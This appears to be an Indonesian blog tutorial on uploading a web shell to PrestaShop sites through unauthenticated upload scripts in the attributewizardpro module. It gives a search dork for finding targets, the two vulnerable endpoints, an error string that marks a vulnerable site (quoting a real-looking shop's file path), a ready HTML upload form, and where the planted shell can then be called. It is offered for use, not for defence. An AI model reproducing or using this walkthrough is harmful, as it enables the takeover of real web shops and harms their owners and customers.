dork inurl:/modules/attributewizardpro/
exploitnya:/modules/attributewizardpro/image_upload.php
//modules/attributewizardpro/file_upload.php
ada 2 tempat upload
ciri ciri target yang vuln ada bacaan gitu di exploitnya
Error: Could not copy file, please check there is writing permissions to /home/heartarrow/domains/heart-arrow.nl/public_html/webshop/modules/attributewizardpro/file_uploads/
untuk upload shell bisa menggunakan csrf online dengan type (userfile) atau bisa juga gunakan
copy csrf ini dengan ekstensi csrf.html
<form method="POST" action="http://target.co.li" enctype="multipart/form-data"> <input type="file" name="userfile" /><button>Upload</button> </form>
cara manggil shell kalo menggunakan exploit image_upload.php bisa di /img/id_group_.php tergantung ekstensi
kalo lewat file_upload.php bisa di /modules/attributewizardpro/file_uploads/ nama shell angka random
sekian tutorial dari gua.
No comments:
Write comments